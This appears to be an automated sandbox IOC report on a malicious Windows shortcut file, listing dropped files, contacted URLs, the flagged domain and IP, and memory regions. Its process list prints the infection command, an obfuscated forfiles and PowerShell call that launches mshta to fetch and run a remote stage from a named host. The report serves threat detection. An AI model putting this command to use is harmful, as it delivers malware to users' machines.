IOC Report
sbOq2d6k2t.lnk

loading gif

Files

File Path
Type
Category
Malicious
sbOq2d6k2t.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=13, Archive, ctime=Sat May 7 04:20:19 2022, mtime=Wed Oct 16 07:57:53 2024, atime=Sat May 7 04:20:19 2022, length=41472, window=hidenormalshowminimized
initial sample
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x0aa80d8e, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\awdr-dynamic-price[1].js
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\checkbox[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\chosen.min[1].css
ASCII text, with very long lines (372)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\flatsome-shop[1].css
Unicode text, UTF-8 text, with very long lines (24156)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\flatsome[1].css
ASCII text, with very long lines (65536), with no line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\label[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\tooltip[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\awdr_style[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\color[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\customize-table[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\front[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\front[2].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\jquery.min[1].js
ASCII text, with very long lines (65447)
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\select_radio_check[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\site_main[1].js
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\by_author[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\classic-themes.min[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\error[1]
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\front[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\gtm4wp-contact-form-7-tracker[1].js
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\husky[1].js
C++ source, ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\quick_search[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\radio[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\awdr_pro[1].js
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\by_instock[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\by_onsales[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\error[1]
HTML document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\styles[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\switcher[1].css
ASCII text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\switcher[2].css
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\warning[1]
GIF image data, version 89a, 36 x 38
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hv2y4nhz.won.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_relhfqw2.1yu.ps1
ASCII text, with no line terminators
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 30 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
. \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
malicious
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
malicious
C:\Windows\System32\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p C:\ /m Windows /c "powershell . \*i*\*2\msh*e https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS

URLs

Name
IP
Malicious
https://gurt.du
unknown
malicious
https://gurt.dun
unknown
malicious
https://gurt.duna.ua
unknown
malicious
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7
185.68.16.189
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/select_radio_check/css/html_types/select_radio_check.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/my-account/lost-password/
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2F
unknown
https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5lw
unknown
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=15
unknown
https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5#_?p4
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.woff?v=3.17.5)
unknown
https://gurt.duna.ua/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5T
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/awdr-dynamic-price.js?ver=2.3.8
185.68.16.189
https://gurt.duna.ua/dohovir-oferty/
unknown
https://gurt.dua/pr
unknown
https://gurt.duna.ua/ru/optovaia-prodazha-duna/
unknown
https://gurt.duna.ua/wp-content/th
unknown
https://gurt.duna.ua/wp-content/plugins/duracelltomi-google-tag-manager/js/gtm4wp-contact-form-7-tracker.js?ver=1.13.1
185.68.16.189
https://gurt.duna.ua/wp-co
unknown
https://gurt.duna.ua/help/
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5E
unknown
https://gurt.duna.ua/wp-includes/css/classic-themes.min.css?ver=1
185.68.16.189
https://gurt.duna.ua/wp-content/uploads/xostanni-zamovlennia-280x280.png.pagespeed.ic.y9zgyMzY4v.png
unknown
https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-180x180.jpg.pagespeed.ic.5J2kHsZjY5.jpg
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5G
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2-
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/plus.svg
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=5.6
unknown
https://gurt.duna.ua/wp-admin/admin-ajax.php
unknown
https://gurt.duna.ua/my-account/orders/
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.ttf?v=3.17.5)
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2:
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/js/jquery.tabSlideO
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/chunk.tooltips.js?ver=3.17.5
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5;
unknown
https://gurt.duna.ua/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0
unknown
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFUkUzdYPFkaVNA6w.woff)
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7.js
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5#
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size:
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6aRs
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.c
unknown
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnI.nav-pagination
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/radio.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.17.5#fl-icons)
unknown
http://crl.ver)
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/js/by_onsales.js?
unknown
https://gurt.duna.ua/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.cs
unknown
https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.jpg.pagespeed.ic.EwuWeIzKab.jpg
unknown
https://schema.org
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.range
unknown
https://gurt.duna.ua/cart/
unknown
http://gmpg.org/xfn/11
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);br
unknown
https://gurt.duna.ua/wp-content/uploads/xzamovlennia-280x280.png.pagespeed.ic.nWjuhwsWVe.png
unknown
https://gurt.duna.ua/wp-content/uploads/xdopomoha-280x280.png.pagespeed.ic.YLuKJA07kn.png
unknown
https://gurt.duna.ua/wp-json/
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7C:
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5C:
unknown
https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Lw
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/slideout.css?ve
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.js
unknown
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWkUzdYPFkaVNA6w.woff)
unknown
https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Lv
unknown
https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWUUzdYPFkaVNA6w.woff)
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.cs
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2yment_
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.17.5)
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=1.3.
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2s
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5...ly
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=1.3.4.2
unknown
https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-32x32.jpg.pagespeed.ic.O2d9531Kcm.jpg
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_author/css/by_author.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/front.js?v
unknown
http://gmpg.org/xfn/114
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.6.2
unknown
https://yoast.com/wordpress/plugins/seo/
unknown
https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5
185.68.16.189
https://gurt.duna.ua/my-account/
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7j
unknown
https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5...
unknown
https://www.morkva.co.ua?utm_source=client-site&utm_medium=client-footer-link
unknown
https://gurt.duna.ua/comments/feed/
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8f
unknown
https://gurt.duna.ua/order-table/
unknown
https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C:
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=1.3.4
unknown
https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5q
unknown
https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1m
unknown
https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5u
unknown
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/color.css?ver=1.3.4.2
185.68.16.189
https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
gurt.duna.ua
185.68.16.189
malicious

IPs

IP
Domain
Country
Malicious
185.68.16.189
gurt.duna.ua
Ukraine
malicious
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName

Memdumps

Base Address
Regiontype
Protect
Malicious
12C6FA5D000
heap
page read and write
13470A90000
trusted library allocation
page read and write
13470830000
trusted library allocation
page read and write
21324EE0000
remote allocation
page read and write
21320940000
trusted library section
page readonly
21320015000
heap
page read and write
134706A6000
heap
page read and write
134706CD000
heap
page read and write
1346FEDD000
trusted library allocation
page read and write
13470430000
heap
page read and write
134704B9000
heap
page read and write
2131F87B000
heap
page read and write
134704EA000
heap
page read and write
13470393000
heap
page read and write
4C3EBFE000
unkown
page readonly
13470665000
heap
page read and write
134704DA000
heap
page read and write
134704DA000
heap
page read and write
1347071E000
heap
page read and write
2131F894000
heap
page read and write
1346FF38000
trusted library allocation
page read and write
213250E5000
heap
page read and write
21324D40000
trusted library allocation
page read and write
2131F7C0000
trusted library allocation
page read and write
21325102000
heap
page read and write
298E8FB000
stack
page read and write
21326000000
heap
page read and write
298EE4E000
stack
page read and write
1347071E000
heap
page read and write
134753B7000
heap
page read and write
13470542000
trusted library allocation
page read and write
134706CD000
heap
page read and write
13470397000
heap
page read and write
4C3E97E000
stack
page read and write
4C3F0FE000
unkown
page readonly
2131FFE1000
trusted library allocation
page read and write
1CF86B10000
heap
page read and write
7DF489760000
trusted library allocation
page readonly
12C6E171000
heap
page read and write
134704E8000
heap
page read and write
134704C7000
heap
page read and write
134703C4000
heap
page read and write
4C3E57E000
stack
page read and write
134753F0000
heap
page read and write
13470411000
heap
page read and write
134753A0000
trusted library allocation
page read and write
21325053000
heap
page read and write
134704EC000
heap
page read and write
298E9FE000
stack
page read and write
1CF86BE0000
heap
page read and write
13470160000
remote allocation
page read and write
13470744000
heap
page read and write
1346FF0D000
trusted library allocation
page read and write
13470810000
trusted library allocation
page read and write
13470742000
heap
page read and write
13470A4A000
trusted library allocation
page read and write
134709DC000
trusted library allocation
page read and write
1347064E000
heap
page read and write
4C3EAFE000
unkown
page readonly
21324E70000
trusted library allocation
page read and write
13470742000
heap
page read and write
134757C0000
trusted library allocation
page read and write
2132011B000
heap
page read and write
1347043A000
heap
page read and write
21324CC0000
trusted library allocation
page read and write
1347040B000
heap
page read and write
1346FF99000
trusted library allocation
page read and write
1347073A000
heap
page read and write
21320113000
heap
page read and write
12C6E115000
heap
page read and write
134704C7000
heap
page read and write
13470542000
trusted library allocation
page read and write
298EF4F000
stack
page read and write
134705B0000
trusted library allocation
page execute
1346FDEE000
heap
page read and write
4C3EDFE000
unkown
page readonly
4C3E77E000
stack
page read and write
13470654000
heap
page read and write
134704E0000
heap
page read and write
1347072A000
heap
page read and write
4C3F2FE000
unkown
page readonly
13470411000
heap
page read and write
134753A0000
trusted library allocation
page read and write
1346FEB8000
trusted library allocation
page read and write
134704D8000
heap
page read and write
13470878000
trusted library allocation
page read and write
13470675000
heap
page read and write
13470676000
heap
page read and write
12C6F9C0000
heap
page read and write
12C6F967000
trusted library allocation
page read and write
1347066E000
heap
page read and write
134706D1000
heap
page read and write
134753A0000
trusted library allocation
page read and write
1346FEF9000
trusted library allocation
page read and write
4C3DEFE000
unkown
page readonly
134705A6000
trusted library allocation
page read and write
13470744000
heap
page read and write
134704C9000
heap
page read and write
12C6F960000
trusted library allocation
page read and write
134703B9000
heap
page read and write
13470665000
heap
page read and write
13470914000
trusted library allocation
page read and write
134704DA000
heap
page read and write
134705AE000
trusted library allocation
page read and write
12C6E0A0000
heap
page read and write
1347036E000
heap
page read and write
134707E9000
heap
page read and write
134704C1000
heap
page read and write
4C3ECFC000
stack
page read and write
134704C7000
heap
page read and write
134704DA000
heap
page read and write
134704F1000
heap
page read and write
134703AC000
heap
page read and write
13470AAC000
trusted library allocation
page read and write
213250FE000
heap
page read and write
12C6E179000
heap
page read and write
134753BA000
heap
page read and write
134703A5000
heap
page read and write
2131F88F000
heap
page read and write
4C3EA7E000
stack
page read and write
134704B8000
heap
page read and write
1346FF00000
trusted library allocation
page read and write
213250ED000
heap
page read and write
134706A6000
heap
page read and write
4C3EE7E000
stack
page read and write
2131F760000
heap
page read and write
1346FF8C000
trusted library allocation
page read and write
298F24C000
trusted library allocation
page read and write
13470648000
heap
page read and write
13470652000
heap
page read and write
13470415000
heap
page read and write
134704B9000
heap
page read and write
134703FE000
heap
page read and write
12C6E070000
heap
page read and write
13470A78000
trusted library allocation
page read and write
13470180000
heap
page read and write
21325104000
heap
page read and write
213250E1000
heap
page read and write
134704B9000
heap
page read and write
21320900000
trusted library section
page readonly
13475400000
heap
page read and write
298E6FB000
stack
page read and write
13470557000
trusted library allocation
page read and write
134707DE000
heap
page read and write
1346FFA0000
heap
page read and write
134704BF000
heap
page read and write
134706CB000
heap
page read and write
1346FF84000
trusted library allocation
page read and write
134704F2000
heap
page read and write
4C3E6FE000
unkown
page readonly
21320640000
trusted library allocation
page read and write
1347039C000
heap
page read and write
21324E10000
trusted library allocation
page read and write
1347053D000
trusted library allocation
page read and write
134704B9000
heap
page read and write
21325060000
heap
page read and write
2131F913000
heap
page read and write
298ECFE000
stack
page read and write
13470733000
heap
page read and write
13470540000
trusted library allocation
page read and write
4C3E9FE000
unkown
page readonly
13470170000
heap
page readonly
1347074C000
heap
page read and write
134706BA000
heap
page read and write
BAEBC7E000
stack
page read and write
134705AB000
trusted library allocation
page read and write
2132502D000
heap
page read and write
21320910000
trusted library section
page readonly
12C6FA50000
heap
page read and write
2131F83F000
heap
page read and write
134704E1000
heap
page read and write
2131F790000
heap
page read and write
134706CF000
heap
page read and write
13470330000
heap
page read and write
13470482000
heap
page read and write
134706CF000
heap
page read and write
1346FF62000
trusted library allocation
page read and write
1346FEB4000
trusted library allocation
page read and write
1346FF1F000
trusted library allocation
page read and write
4C3E3FB000
stack
page read and write
21320950000
trusted library section
page readonly
13470542000
trusted library allocation
page read and write
7DF489751000
trusted library allocation
page execute read
134704BF000
heap
page read and write
13470401000
heap
page read and write
21324CB0000
trusted library allocation
page read and write
1347072A000
heap
page read and write
13470AB0000
trusted library allocation
page read and write
13470A2A000
trusted library allocation
page read and write
134705F8000
heap
page read and write
134704C1000
heap
page read and write
21325020000
heap
page read and write
2131F8AC000
heap
page read and write
13470675000
heap
page read and write
2132011A000
heap
page read and write
21320920000
trusted library section
page readonly
13470733000
heap
page read and write
134704B8000
heap
page read and write
134704AA000
heap
page read and write
21324D30000
trusted library allocation
page read and write
1346FF80000
trusted library allocation
page read and write
13470399000
heap
page read and write
1346FF08000
trusted library allocation
page read and write
134704B9000
heap
page read and write
134753B0000
trusted library allocation
page read and write
1346FF7B000
trusted library allocation
page read and write
1347073A000
heap
page read and write
13470555000
trusted library allocation
page read and write
134706BA000
heap
page read and write
213250F5000
heap
page read and write
134753C0000
trusted library allocation
page read and write
1346FDF4000
heap
page read and write
213250CE000
heap
page read and write
1346FEF7000
trusted library allocation
page read and write
21324E10000
trusted library allocation
page read and write
21324D70000
trusted library allocation
page read and write
21325105000
heap
page read and write
134704C7000
heap
page read and write
21324D20000
trusted library allocation
page read and write
134707F6000
trusted library allocation
page read and write
1347039C000
heap
page read and write
1347049C000
heap
page read and write
13470531000
trusted library allocation
page read and write
12C6E14F000
heap
page read and write
134704D8000
heap
page read and write
134704D8000
heap
page read and write
1CF86BE9000
heap
page read and write
2131F8FD000
heap
page read and write
1347038E000
heap
page read and write
1347038B000
heap
page read and write
13470654000
heap
page read and write
298F14E000
stack
page read and write
134703F5000
heap
page read and write
134704D2000
heap
page read and write
1347033D000
heap
page read and write
13470495000
heap
page read and write
7DF489750000
trusted library allocation
page readonly
12C6E0B9000
heap
page read and write
134704C7000
heap
page read and write
1347074C000
heap
page read and write
134704D4000
heap
page read and write
13470A2A000
trusted library allocation
page read and write
1346FEA8000
trusted library allocation
page read and write
13470A42000
trusted library allocation
page read and write
298DFCE000
stack
page read and write
13470411000
heap
page read and write
134704E9000
heap
page read and write
13474E12000
trusted library allocation
page read and write
21320CB0000
trusted library allocation
page read and write
13470914000
trusted library allocation
page read and write
134707E8000
heap
page read and write
2131F813000
heap
page read and write
134753FF000
heap
page read and write
13470463000
heap
page read and write
134707E4000
heap
page read and write
134703BD000
heap
page read and write
134704BF000
heap
page read and write
1347071E000
heap
page read and write
134704B9000
heap
page read and write
134707E6000
heap
page read and write
134707DE000
heap
page read and write
134703B9000
heap
page read and write
12C6FA54000
heap
page read and write
134708F8000
trusted library allocation
page read and write
13470656000
heap
page read and write
13470449000
heap
page read and write
2131F878000
heap
page read and write
213250F1000
heap
page read and write
12C6F990000
trusted library allocation
page read and write
1347074C000
heap
page read and write
134706C4000
heap
page read and write
21324DB0000
trusted library allocation
page read and write
21324EA0000
trusted library allocation
page read and write
BAEB97C000
stack
page read and write
1346FF68000
trusted library allocation
page read and write
134705DE000
trusted library allocation
page read and write
21324E20000
trusted library allocation
page read and write
4C3DFF9000
stack
page read and write
13470A94000
trusted library allocation
page read and write
21320820000
trusted library allocation
page read and write
13470648000
heap
page read and write
2131F800000
heap
page read and write
298E2F3000
stack
page read and write
1347040D000
heap
page read and write
134704B9000
heap
page read and write
13470424000
heap
page read and write
134753B2000
heap
page read and write
12C6E0C6000
heap
page read and write
1347040D000
heap
page read and write
BAEB9FE000
stack
page read and write
1CF86AF0000
heap
page read and write
12C6E050000
heap
page read and write
13470408000
heap
page read and write
13470535000
trusted library allocation
page read and write
13470444000
heap
page read and write
134704D8000
heap
page read and write
13470675000
heap
page read and write
13470650000
heap
page read and write
4C3E5FE000
unkown
page readonly
134704E1000
heap
page read and write
298EAFE000
stack
page read and write
4C3E67E000
stack
page read and write
134704B9000
heap
page read and write
134753FB000
heap
page read and write
2131F82A000
heap
page read and write
4C3E1FB000
stack
page read and write
298EDFC000
stack
page read and write
1347040D000
heap
page read and write
1347038D000
heap
page read and write
13470742000
heap
page read and write
134757B3000
trusted library allocation
page read and write
13470A7C000
trusted library allocation
page read and write
4C3DCFE000
unkown
page readonly
134706D1000
heap
page read and write
13470AC0000
trusted library allocation
page read and write
13470A50000
trusted library allocation
page read and write
134733A0000
trusted library allocation
page execute
13470744000
heap
page read and write
298EBFD000
stack
page read and write
4C3E7FE000
unkown
page readonly
134757B0000
trusted library allocation
page read and write
134706C4000
heap
page read and write
1346FF4B000
trusted library allocation
page read and write
1347073A000
heap
page read and write
21324D41000
trusted library allocation
page read and write
13470AA8000
trusted library allocation
page read and write
4C3F87E000
stack
page read and write
298E5FB000
stack
page read and write
12C6F980000
trusted library allocation
page read and write
1346FDD6000
heap
page read and write
2131F929000
heap
page read and write
2131F872000
heap
page read and write
4C3F1FE000
stack
page read and write
21324E90000
trusted library allocation
page read and write
4C3EEFE000
unkown
page readonly
134704E9000
heap
page read and write
134705DE000
trusted library allocation
page read and write
1346FDA4000
heap
page read and write
213250BF000
heap
page read and write
2131F866000
heap
page read and write
21324D84000
trusted library allocation
page read and write
21324DB3000
trusted library allocation
page read and write
21320000000
heap
page read and write
134709F0000
heap
page read and write
134704C7000
heap
page read and write
12C6E0DF000
heap
page read and write
2131F82F000
heap
page read and write
298F04B000
stack
page read and write
21320002000
heap
page read and write
134708F8000
trusted library allocation
page read and write
4C3EB7E000
stack
page read and write
2131F7D0000
trusted library section
page read and write
134703C4000
heap
page read and write
13470550000
trusted library allocation
page read and write
134706D1000
heap
page read and write
4C3D87B000
stack
page read and write
134704F1000
heap
page read and write
4C3DDFE000
stack
page read and write
12C6E080000
heap
page read and write
134704E8000
heap
page read and write
1346FDA0000
heap
page read and write
1347040D000
heap
page read and write
134704DA000
heap
page read and write
4C3F8FE000
unkown
page readonly
12C6E0AE000
heap
page read and write
1347038B000
heap
page read and write
1346FF59000
trusted library allocation
page read and write
134703BD000
heap
page read and write
134703FC000
heap
page read and write
1346FDC1000
heap
page read and write
13470160000
remote allocation
page read and write
4C3DBF7000
stack
page read and write
1CF86A10000
heap
page read and write
134704EC000
heap
page read and write
21320391000
trusted library allocation
page read and write
134704E9000
heap
page read and write
2131F88B000
heap
page read and write
2131F8B0000
heap
page read and write
13470652000
heap
page read and write
2132503F000
heap
page read and write
134706CB000
heap
page read and write
1346FDB9000
heap
page read and write
1347064E000
heap
page read and write
134703FA000
heap
page read and write
13470878000
trusted library allocation
page read and write
1346FF43000
trusted library allocation
page read and write
2132508E000
heap
page read and write
12C6E0A8000
heap
page read and write
1346FF27000
trusted library allocation
page read and write
13470591000
trusted library allocation
page read and write
1346FEE0000
trusted library allocation
page read and write
134753F9000
heap
page read and write
21320100000
heap
page read and write
13470404000
heap
page read and write
1346FF6B000
trusted library allocation
page read and write
21320102000
heap
page read and write
13470612000
heap
page read and write
134752F0000
trusted library allocation
page read and write
134753B0000
heap
page read and write
13470878000
trusted library allocation
page read and write
13470A97000
trusted library allocation
page read and write
12C6E17C000
heap
page read and write
1346FEFE000
trusted library allocation
page read and write
2131F902000
heap
page read and write
2132015B000
heap
page read and write
298E7FF000
stack
page read and write
21324EE0000
remote allocation
page read and write
2132504C000
heap
page read and write
4C3E2FE000
unkown
page readonly
2131F780000
heap
page read and write
13470650000
heap
page read and write
12C6E07E000
heap
page read and write
13470A30000
trusted library allocation
page read and write
134753BC000
heap
page read and write
134704E1000
heap
page read and write
7DF489771000
trusted library allocation
page execute read
134705D0000
trusted library allocation
page read and write
1346FDE9000
heap
page read and write
1347062F000
heap
page read and write
4C3E4FE000
unkown
page readonly
13470733000
heap
page read and write
134704BF000
heap
page read and write
21324D80000
trusted library allocation
page read and write
134706CF000
heap
page read and write
7DF489761000
trusted library allocation
page execute read
21324EE0000
remote allocation
page read and write
2131F89F000
heap
page read and write
134704E9000
heap
page read and write
21325000000
heap
page read and write
13470569000
trusted library allocation
page read and write
134706CD000
heap
page read and write
134707E3000
heap
page read and write
13475310000
trusted library allocation
page read and write
13470160000
remote allocation
page read and write
